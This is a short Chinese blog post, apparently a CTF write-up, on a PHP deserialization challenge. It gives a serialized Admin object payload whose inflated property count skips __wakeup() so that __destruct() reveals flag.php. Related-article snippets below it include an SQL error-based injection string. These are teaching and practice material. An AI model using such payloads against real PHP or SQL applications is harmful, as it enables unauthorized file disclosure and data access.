浅析cumt平台上的一道反序列化题目

最新推荐文章于 2024-01-18 19:37:23 发布
最新推荐文章于 2024-01-18 19:37:23 发布
阅读量273 收藏
点赞数
分类专栏: CTF Web 文章标签: CTF php 反序列化 Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011377996/article/details/79514815
版权
CTF 同时被 2 个专栏收录
33 篇文章 8 订阅
订阅专栏
Web
22 篇文章 0 订阅
订阅专栏

听说你会面向对象

这题用了反序列化的一个漏洞,如果还不知道什么是反序列化,参考下面的文章
http://www.freebuf.com/column/151447.html

这一题其实还是很简单的,只是我不知道php反序列化的一个漏洞,那就是PHP当序列化字符串中表示对象属性数的值大于真实的属性个数时会跳过wakeup()的执行

因为我一开始构造的类是这样的

<?php

class Admin{
    public $file ;
}


$a = new Admin();
$a->file='flag.php';
print_r (serilize($a));

?>

然后得到 data=O:5:"Admin":1:{s:4:"file";s:8:"flag.php";}
然后发现是这个样子的
这里写图片描述
肯定是在序列化的时候__wakeup()函数在搞鬼,后面加了1.。。。
其实这段代码主要是利用了___destruct()函数把文件内容会显示出来
于是就利用上面说的那一个漏洞改一下payload:data=O:5:”Admin”:2:{s:4:”file”;s:8:”flag.php”;}
flag就出来了
这里写图片描述

看来自己对于反序列化还是了解甚小,不得不承认自己还是个菜鸡,参考博文
http://www.voidcn.com/article/p-ybezdnbn-bmu.html
https://mp.weixin.qq.com/s__biz=MzIzOTQ5NjUzOQ%3D%3D&mid=2247483735&idx=1&sn=a886de95750b069c87961ce336fe2f6d&chksm=e9287d63de5ff475a095abe626d386c94509f14298b46b3271c1f9776691ffe2e531024a12f9&mpshare=1&scene=23&srcid=0907F7nrIu4WchffyQBy9jks#rd

0verWatch
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
序列序列例题net
12-12
序列序列例题net 序列序列例题net 序列序列例题net
序列序列的简单例子
weixin_30542079的博客
03-03 90
基本序列 要使一个类可序列,最简单的方法是使用 Serializable 属性对它进行标记,如下所示: [Serializable] public class MyObject { public int n1 = 0; public int n2 = 0; public String str = null; } 以下代码片段说明了如何将此类的一个实例序列为一...
两道序列例题
limenzzz的博客
05-03 1256
攻防世界: 1.Web_php_unserialize 先代码审计,发现定义了demo类,而在其中有一句 这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中,于是需要构造序列的demo类,且要绕过wake_up函数,根据上篇可知,只要输入的数据数少于规定的就可以绕过。于是需要构造 O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";} //原构造,未构建任何绕过 O:4:"demo":2:{s:10:"De
序列(Unserialize)题目讲解
qq_49422880的博客
10-05 5584
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
一道序列的CTF题分享
seek_2022的博客
07-23 1096
一道有趣的CTF题目
cumt.rar_cumt_opnet_拓扑图
09-23
总的来说,"cumt.rar_cumt_opnet_拓扑图"提供了一个宝贵的OPNET学习平台,通过实际操作和案例分析,可以帮助读者深入了解网络建模和性能评估的复杂性,从而在IT职业生涯中更好地应对网络设计和优的挑战。
CUMT2021算法导论OJ(python版).rar
11-16
CUMT2021算法导论OJ(python版).rar》是一个压缩包,包含的资源主要用于学习和实践算法,特别强调了Python语言的应用。这个资源可能出自中国矿业...同时,积极参与OJ上的题目挑战,有助于巩固知识并适应实际应用环境。
CUMT微机原理练习题
08-23
CUMT微机原理的复习题
基于 Python 实现的CUMT密码学课程设计源代码
最新发布
06-13
【作品名称】:基于 Python 实现的CUMT密码学课程设计源代码 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:基于 ...
CUMT密码学课程设计源码.7z
12-13
CUMT密码学课程设计源码.7z A5.py ---------------> A5加解密 RC4加解密.py-----------------> RC4加解密 DES_destruct----------->DES加解密的S盒,P盒等结构 DES加解密文件.py ---------->DES核心算法 Digital...
(Java)序列小练习
m0_46390077的博客
01-18 437
JAVA序列漏洞是由于开发者重写了readObject方法,该readObject方法方法调用了别的方法,最终执行到了例如Transfrom方法的危险方法。person调用talk时时调用了自己的talk,student中没有自己的talk但是student继承了person父类的talk方法。方法,该方法用于向标准输出设备(通常是控制台)打印一行字符串并自动换行。在这里,它打印出的是字符串"lin"。:这一行是在主方法内部的唯一一行代码,它调用了Java内置的。自己有了talk就调用自己的。
PHP序列入门题
ailx10
10-20 350
每一天都是新的一天,每一天都会接受新的信息,每一天都会有新的成长,昨天接到一个付费咨询,一直到晚上睡前才记起来,客户是一个大一学生,参加了大学的网络安全社团,然后遇到了一道题目,想求助我帮忙解决~这题考察的是PHP序列,还有对象的构造函数和析构函数,算是Web安全入门题,有兴趣和想法的小伙伴,可以在知乎平台购买Web安全三册,比京东便宜一点,本着助人为乐的精神,就帮助这位小兄弟分析一下~首先是...
序列】基础题_lemon
serendipity1130的博客
08-29 307
1.代码审计: evil类中有show_source函数,所以想要得到flag需要实例一个lemon类让他去调用evil类中的action()函数。 2.为什么要实例:因为只有实例之后,才能将这个对象放到内存中,然后才能在规定的范围内来调用。这不包括静态对象,静态对象是可以直接调用的。 3.写poc链,首先申明lemon和evil两个类,然后将evil类赋值给classobj变量,让他执行evil类中的show_resource函数。Private和protected对象要进行url编码
序列序列知识总结
z_fighting的博客
11-28 144
1、单一对象,无继承关系:若想实现序列序列,则必须实现序列接口,否则报异常:NotSerializableException 2、对象间有继承关系,但无引用关系,若想实现序列序列,则父类必须实现序列接口或提供无参构造函数,否则报invalidClassException 3、对象间有继承关系,并且有引用关系,若想实现序列序列,则父类必须实现序列接口。...
编程题—序列序列
chengtutu的博客
05-16 514
题目描述 请实现两个函数,分别用来序列序列二叉树 思路:(1)首先我们需要先构建一颗二叉树 构建二叉树的思路:第一步:将数组中的元素封装成TreeNode类型的节点装入nodeList链表中。 第二步:根据二叉树父亲节点与其对应孩纸...
PHP序列漏洞(最全面最详细有例题)
m0_73728268的博客
04-14 2461
详细讲解PHP序列漏洞的基本原理及利用,由简入精,深入浅出;包含Docker环境搭建,例题解析;类与对象简介;序列序列基础知识;魔术方法原理及利用;POP链构造及解析;字符串逃逸;session序列,phar序列等;
2020年王鼎杯序列题目复现
qq_40909772的博客
11-03 1344
1.think_java。 题目描述如下: 下载题目附件,发现是java程序,使用jd-gui进行编译,如下图: 发现test.class中有调用swagger API,百度找到swagger的访问地址如:http://127.0.0.1:8081/swagger-ui.html。构造相关URL访问。 发现没有用户登录的数据,返回继续审计代码,查看SqlDict.class,发现代码中有sql语句,对应着swagger API的字典库功能,数据库名字叫myapp,在对应页面进行sql注入。 构造的
序列序列的简单认识
weixin_30408309的博客
01-30 57
  把对象转换为字节序列的过程称为对象的序列。  把字节序列恢复为对象的过程称为对象的序列。  对象的序列主要有两种用途:  1) 把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中;  2) 在网络上传送对象的字节序列。   在很多应用中,需要对某些对象进行序列,让它们离开内存空间,入住物理硬盘,以便长期保存。比如最常见的是Web服务器中的Session对象,当有 10万用户并...
PHP序列题目
Galaxy_fan的博客
10-01 882
百度杯十月场_Hash hash用Md5解密是kkkkkk01123 把123换成234,MD5加密 获得变量var,base64解密,正则匹配,如果匹配程序结束,否则序列变量var 为了得到f15g_is_here.php内容要绕过正则匹配和_wakeup方法。_wakeup有一个bug就是当序列字符串中表示对象属性个数的值大于真是的属性个数是就会跳过_wakeup,然后绕过正则可以...
cumt网络安全实验
11-11
cumt网络安全实验是中国矿业大学(北京)开设的一门实践课程,旨在培养学生对网络安全领域的理论知识和实际操作技能。这门课程内容涵盖了网络攻防技术、安全漏洞挖掘、数据加密与解密、安全协议设计等方面的内容。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值